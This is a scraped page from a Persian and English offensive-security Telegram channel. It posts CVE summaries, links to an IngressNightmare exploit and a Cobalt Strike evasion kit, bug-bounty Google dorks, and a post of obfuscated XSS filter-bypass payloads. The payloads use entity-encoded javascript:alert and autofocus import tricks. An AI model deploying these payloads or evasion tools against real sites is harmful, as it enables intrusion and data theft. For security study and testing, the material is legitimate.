RadvanSec – Telegram
RadvanSec
990 subscribers
181 photos
27 videos
142 files
595 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
از جابه‌جا شدن بین تب‌ها برای OSINT (اطلاعات متن‌باز — Open Source Intelligence) و Recon (شناسایی و بازشناسی) خسته‌اید؟ فقط به Discord ما بپیوندید و تایپ کنید sudo help (فرمان‌نما برای اجرا با دسترسی ادمین در لینوکس/یونیکس) تا ابزارهای قدرتمند در عرض چند ثانیه باز شود!

IP & Domain Lookup (جست‌وجوی آدرس IP و دامنه)
Email & Phone OSINT (جمع‌آوری اطلاعات ایمیل و شماره تلفن — OSINT)
Subdomain Enumeration (پیمایش زیردامنه‌ها)
Reverse Image Search (جست‌وجوی معکوس تصویر)
URL & Virus Scanners (اسکنر آدرس‌ها و بدافزار)
Temp Email (ایمیل موقت)، QR Tools (ابزارهای کد QR)، و موارد دیگر

🌟 می‌توانید در یک دقیقه CTF بسازید و بازی کنید — درست داخل Discord!

همین حالا امتحان کنید — سریع، ساده و همه‌چیز در یک چت.
🔗 [https://discord.gg/u7uMFV833h](https://discord.gg/u7uMFV833h)

#ctf #bugbounty #osint #cybersecurity #discordtools #infosec

⭐️ @RadvanSec
3
XSS Bypass

Payloads:

<img+src%3Dx+onerror%3D"%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">


--'<00 foo="<a%20href="javanoscript​:prompt(404)">XSS-Click</00>--%20//
2👌1
Forwarded from GO-TO CVE (| | Sharo K h | |)
<<https:X55.is/onfocus=1?import(tagName):1+AutoFocus+ContentEditable>>
1👍1👌1
RadvanSec
BugBounty Program Google Dorks (part2): inurl:/security ext:txt "contact" "powered by synack" intext:responsible disclosure bounty inurl: private bugbountyprogram inurl:/.well-known/security ext:txt inurl:/.well-known/security ext:txt intext:hackerone inurl:/.well…
https://news.1rj.ru/str/bbprograms

علاوه بر دورک هایی که در پیام ریپلی شده موجوده، میتونین برای پیدا کردن تارگت های خارج پلتفرم باگ بانتی، از این چنل استفاده کنین

⭐️ @RadvanSec
7
Crystal Kit
Evasion for Cobalt Strike

https://github.com/rasta-mouse/Crystal-Kit

⭐️ @RadvanSec
2🔥1
CVE-2025-24071
Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file simply extracting it is enough to trigger the leak.
-------------------------
«Windows Explorer به‌طور خودکار وقتی یک فایل .library-ms از یک آرشیو .rar استخراج می‌شود، یک درخواست احراز هویت SMB (پروتکل اشتراک فایل مایکروسافت) آغاز می‌کند که منجر به افشای هش NTLM (هشِ پروتکل احراز هویت ویندوز) می‌شود. کاربر نیازی به باز کردن یا اجرای فایل ندارد — صرفِ استخراج آن کافی است تا نشت رخ دهد.»

Exploit

⭐️ @RadvanSec
5
Media is too big
VIEW IN TELEGRAM
Generative AI for OSINT: Next Level Techniques for ChatGPT and Beyond

⭐️ @RadvanSec
2
Exploit for Ingress NGINX - IngressNightmare

This project provides an exploit targeting critical unauthenticated Remote Code Execution (RCE) vulnerabilities in the Ingress NGINX Controller for Kubernetes, collectively referred to as IngressNightmare. (Research by Wiz)

In the original research, the Wiz team did not provide a PoC or a functional exploit, so we decided to create our own and share it with the community.

——————————————————
اکسپلویت برای Ingress NGINX - IngressNightmare

این پروژه اکسپلویتی را ارائه می‌دهد که آسیب‌پذیری‌های حیاتی اجرای کد از راه دور (RCE) احراز هویت نشده در کنترلر Ingress NGINX برای Kubernetes، که به طور کلی IngressNightmare نامیده می‌شود، را هدف قرار می‌دهد. (تحقیق توسط Wiz)

در تحقیق اصلی، تیم Wiz یک PoC یا یک اکسپلویت کاربردی ارائه نکرد، بنابراین ما تصمیم گرفتیم خودمان آن را ایجاد کنیم و با جامعه به اشتراک بگذاریم.

Exploit

⭐️ @RadvanSec
👍21
Forwarded from NSEs
How_a_Toreon_ski_trip_led_to_a_CVE_in_MikroTik's_Wi_Fi_Hotspot.pdf
458.8 KB
How a Toreon ski-trip led to a CVE in MikroTik's Wi-Fi Hotspot

CHANNEL
GROUP
DISCORD
4
#MITRE ATT&CK v18 Release
October 2025

تغییرات کلیدی:
- بازنگری بخش دفاعی و جایگزینی «تشخیص (Detections)» با «راهکارهای تشخیص (Detection Strategies)»
- اضافه شدن شاخص‌های تحلیلی (Analytics) و اجزای داده (Data Components) جدید
- بازگردانی قابلیت «سوء‌استفاده از امکانات دسترس‌پذیری» (Abuse Accessibility Features) در بخش موبایل
- آمار کلی: ۹۱۰ مورد نرم‌افزار، ۱۷۶ گروه، ۵۵ کمپین ثبت شده در این نسخه

🔗 https://attack.mitre.org/resources/updates/updates-october-2025/

⭐️ @RadvanSec
👍52
Forwarded from OnHex
🔴 آسیب پذیری با شناسه ی CVE-2025-11705 در افزونه ی وردپرسی Anti-Malware Security and Brute-Force Firewall کشف و اصلاح شده که امکان افشای اطلاعات رو به مهاجمی که عضو سایت (Subscriber) هستش، میده.

نسخه های تحت تاثیر: ۴.۲۳.۸۱ و قبل‌ تر
نسخه اصلاح شده: ۴.۲۳.۸۳

سایتهایی که از نسخه های آسیب پذیر استفاده میکنن و همچنین امکان عضویت داخلشون فعال هستش، تحت تاثیر آسیب پذیری هستن.

آسیب پذیری در تابع GOTMLS_ajax_scan هستش و امکان خوندن فایلهای دلخواه رو به مهاجم میده. مثلا مهاجم میتونه فایل wp-config.php رو بخونه.

#وردپرس #آسیب_پذیری_امنیتی
#worpress #CVE

🆔 @onhex_ir
➡️ ALL Link
1👍1
⭐️ @RadvanSec
1👍1
From Day ZeroTo Zero Day-EA.pdf
910 KB
⭐️ @RadvanSec
👍21
🔥31